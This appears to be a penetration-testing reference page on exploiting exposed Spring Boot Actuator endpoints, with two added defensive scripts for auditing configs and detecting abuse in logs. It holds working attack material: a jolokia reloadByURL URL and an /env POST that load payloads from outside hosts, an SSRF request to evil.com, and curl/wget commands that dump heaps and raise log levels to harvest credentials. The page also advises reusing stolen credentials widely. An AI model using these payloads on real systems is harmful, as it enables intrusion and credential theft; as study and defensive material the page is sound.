Spring Actuators
Spring Auth Bypass
From https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png
Exploiting Spring Boot Actuators
Check the original post at https://www.veracode.com/blog/research/exploiting-spring-boot-actuators
Key Points:
- Spring Boot Actuators register endpoints such as /health, /trace, /beans, /env, etc. In versions 1 to 1.4 these endpoints are accessible without authentication. From version 1.5 onwards, only /health and /info are non-sensitive by default, but developers often disable this protection.
- Certain Actuator endpoints can expose sensitive data or allow dangerous actions: /dump, /trace, /logfile, /shutdown, /mappings, /env, /actuator/env, /restart, and /heapdump.
- In Spring Boot 1.x, actuators are registered under the root URL, while in 2.x they sit under the /actuator/ base path.
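As an added example (not code from the page or from Spring), the script below audits a Spring Boot application.properties for Actuator endpoints reachable over HTTP, applying the include/exclude semantics of the real management.endpoints.web.exposure.* keys; the sensitive-endpoint list is taken from this page and the sample configs are constructed.

```python
# Added example (not from the page or Spring): audit a Spring Boot
# application.properties for Actuator endpoints reachable over HTTP.
# Endpoints this page flags as sensitive when exposed without auth.
SENSITIVE = {"env", "heapdump", "loggers", "logfile", "httpexchanges",
             "jolokia", "shutdown", "restart", "mappings", "trace", "dump",
             "configprops"}
DEFAULT_INCLUDE = {"health", "info"}  # Spring Boot 2.x web default

def parse_properties(text):
    """Minimal key=value parser; '#' comments and blank lines are skipped."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#"):
            key, sep, value = line.partition("=")
            if sep:
                props[key.strip()] = value.strip()
    return props

def _csv(value):
    return {v.strip() for v in value.split(",") if v.strip()}

def exposed_endpoints(props):
    """Spring's rules: '*' means every endpoint and exclude wins over include."""
    include = props.get("management.endpoints.web.exposure.include")
    exclude = _csv(props.get("management.endpoints.web.exposure.exclude", ""))
    included = DEFAULT_INCLUDE if include is None else _csv(include)
    if "*" in included:
        included = SENSITIVE | DEFAULT_INCLUDE
    if "*" in exclude:
        return set()
    exposed = included - exclude
    # /shutdown is disabled by default even when exposed; it needs enabled=true
    if props.get("management.endpoint.shutdown.enabled", "false").lower() != "true":
        exposed.discard("shutdown")
    return exposed

def audit(text):
    """Return the sorted list of sensitive endpoints a config exposes."""
    return sorted(exposed_endpoints(parse_properties(text)) & SENSITIVE)

# Constructed samples: WEAK mirrors the misconfiguration the page describes,
# HARDENED keeps only health and info reachable.
WEAK_CONFIG = ("management.endpoints.web.exposure.include=*\n"
               "management.endpoint.shutdown.enabled=true\n")
HARDENED_CONFIG = ("management.endpoints.web.exposure.include=health,info\n"
                   "management.endpoints.web.exposure.exclude=env,heapdump\n")
```

Run audit() over each deployed profile's properties; any non-empty result for a service that is not behind authentication is a finding.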
Exploitation Techniques:
- Remote Code Execution via '/jolokia':
 - The /jolokia actuator endpoint exposes the Jolokia library, which allows access to MBeans over HTTP.
 - The reloadByURL action can be used to reload the logging configuration from an external URL, which can lead to blind XXE or Remote Code Execution via crafted XML.
 - Example exploit URL: http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml
- Config Modification via '/env':
 - If Spring Cloud libraries are present, the /env endpoint allows modification of environment properties.
 - Properties can be modified to trigger various vulnerabilities, such as the XStream deserialization vulnerability in the Eureka serviceURL.
 - Example exploit POST request:
POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
- Other Useful Settings:
 - Properties such as spring.datasource.tomcat.validationQuery, spring.datasource.tomcat.url, and spring.datasource.tomcat.max-active can be modified for various exploits, such as SQL injection or changing database connection strings.
Additional Information:
- A complete list of default actuators is available here.
- The /env endpoint in Spring Boot 2.x uses a JSON format for property modification, but the core concept remains the same.
Related Topics:
- Env + H2 RCE:
 - Details on exploiting the combination of the /env endpoint and an H2 database are available here.
- SSRF on Spring Boot Through Incorrect Pathname Interpretation:
 - The way the Spring framework handles matrix parameters (;) in HTTP pathnames can be exploited for Server-Side Request Forgery (SSRF).
 - Example exploit request:
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
HeapDump secrets mining (credentials, tokens, internal URLs)
If /actuator/heapdump is exposed, you can usually obtain a full JVM heap snapshot that frequently contains live secrets (DB creds, API keys, Basic-Auth, internal service URLs, Spring property maps, etc.).
- Download and quick triage:
wget http://target/actuator/heapdump -O heapdump
# Quick wins: look for HTTP auth and JDBC
strings -a heapdump | grep -nE 'Authorization: Basic|jdbc:|password=|spring\.datasource|eureka\.client'
# Decode any Basic credentials you find
printf %s 'RXhhbXBsZUJhc2U2NEhlcmU=' | base64 -d
- Deeper analysis with VisualVM and OQL:
 - Open the heapdump in VisualVM, inspect java.lang.String instances, or run OQL to hunt for secrets:
select s.toString()
from java.lang.String s
where /Authorization: Basic|jdbc:|password=|spring\.datasource|eureka\.client|OriginTrackedMapPropertySource/i.test(s.toString())
- Automated extraction with JDumpSpider:
java -jar JDumpSpider-*.jar heapdump
Typical high-value findings:
- Spring DataSourceProperties/HikariDataSource objects exposing url, username, password.
- OriginTrackedMapPropertySource entries exposing management.endpoints.web.exposure.include, service ports, and Basic-Auth embedded in URLs (e.g., Eureka defaultZone).
- Raw HTTP request/response fragments containing Authorization: Basic ... captured in memory.
Tips:
- Use a Spring-focused wordlist to discover actuator endpoints quickly (e.g., SecLists spring-boot.txt) and always check whether /actuator/logfile, /actuator/httpexchanges, /actuator/env, and /actuator/configprops are exposed as well.
- Credentials from a heapdump often work for neighbouring services and sometimes for system users (SSH), so try them widely.
Abusing Actuator loggers/logging to capture credentials
If management.endpoints.web.exposure.include allows it and /actuator/loggers is exposed, you can dynamically raise log levels to DEBUG/TRACE for the packages that handle authentication and request processing. Combined with readable logs (via /actuator/logfile or known log paths), this can leak credentials submitted during login flows (e.g., Basic-Auth headers or form parameters).
- Enumerate and crank up sensitive loggers:
# List available loggers
curl -s http://target/actuator/loggers | jq .
# Enable very verbose logs for security/web stacks (adjust as needed)
curl -s -X POST http://target/actuator/loggers/org.springframework.security \
-H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
curl -s -X POST http://target/actuator/loggers/org.springframework.web \
-H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
curl -s -X POST http://target/actuator/loggers/org.springframework.cloud.gateway \
-H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
- Find where logs are written and harvest:
# If exposed, read from Actuator directly
curl -s http://target/actuator/logfile | strings | grep -nE 'Authorization:|username=|password='
# Otherwise, query env/config to locate file path
curl -s http://target/actuator/env | jq '.propertySources[].properties | to_entries[] | select(.key|test("^logging\\.(file|path)"))'
- Trigger login/authentication traffic and parse the log for creds. In microservice setups with a gateway in front of auth, enabling TRACE for the gateway/security packages often makes headers and form bodies visible. Some environments even generate synthetic login traffic periodically, so simply collect once logging is verbose.
Notes:
- Restore log levels when finished: POST /actuator/loggers/<logger> with { "configuredLevel": null }.
- If /actuator/httpexchanges is exposed, it can also reveal recent request metadata that may include sensitive headers.
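As an added detection example (not code from the page or from any tool it references), this script runs the abuse patterns from the heapdump, /env, jolokia, loggers and matrix-parameter SSRF sections above over combined-format access-log lines; the log lines, IPs and hostnames are constructed, and the jolokia request mirrors the page's example URL with a placeholder host.

```python
# Added example (not from the page): flag Actuator-abuse patterns in
# access-log lines, covering the heapdump, /env, jolokia, loggers and
# matrix-parameter SSRF techniques described above.
import re

# Apache/nginx combined-log prefix: client IP ... "request line" status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<req>[^"]*)" (?P<status>\d{3})')

# Each rule is matched against the request line ("METHOD path HTTP/x").
RULES = [
    ("heapdump-download",   re.compile(r"^GET /(actuator/)?heapdump\b")),
    ("logger-level-change", re.compile(r"^POST /(actuator/)?loggers/")),
    ("env-modification",    re.compile(r"^POST /(actuator/)?env\b")),
    ("jolokia-reloadByURL", re.compile(r"^\w+ /(actuator/)?jolokia/exec/.*reloadByURL")),
    ("sensitive-read",      re.compile(r"^GET /(actuator/)?(env|logfile|httpexchanges|"
                                       r"configprops|mappings|trace|dump)\b")),
    ("matrix-param-ssrf",   re.compile(r"^\w+ ;@")),
]

def classify(request_line):
    """Return the first matching rule name, or None for benign traffic."""
    for name, pattern in RULES:
        if pattern.search(request_line):
            return name
    return None

def detect(lines):
    """Return (ip, rule, request_line) tuples for every suspicious entry."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a real pipeline would count these
        rule = classify(m.group("req"))
        if rule:
            hits.append((m.group("ip"), rule, m.group("req")))
    return hits

# Constructed sample log (IPs and hosts are documentation/invalid ranges).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /actuator/health HTTP/1.1" 200 15 "-" "curl/8.0"
198.51.100.7 - - [10/Oct/2023:13:55:40 +0000] "GET /actuator/heapdump HTTP/1.1" 200 52428800 "-" "Wget/1.21"
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "POST /actuator/loggers/org.springframework.security HTTP/1.1" 204 0 "-" "curl/8.0"
203.0.113.9 - - [10/Oct/2023:13:57:12 +0000] "POST /env HTTP/1.1" 200 0 "-" "python-requests/2.31"
203.0.113.9 - - [10/Oct/2023:13:58:00 +0000] "GET /jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/attacker.invalid!/logback.xml HTTP/1.1" 200 120 "-" "curl/8.0"
203.0.113.9 - - [10/Oct/2023:13:59:00 +0000] "GET ;@evil.invalid/url HTTP/1.1" 400 0 "-" "curl/8.0"
"""
```

A 200 on heapdump-download or a 204 on logger-level-change from an unexpected source is the strongest signal; the benign /actuator/health line produces no hit.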
References
- Exploring Spring Boot Actuator Misconfigurations (Wiz)
- VisualVM
- JDumpSpider
- 0xdf – HTB Eureka (Actuator heapdump to creds, Gateway logging abuse)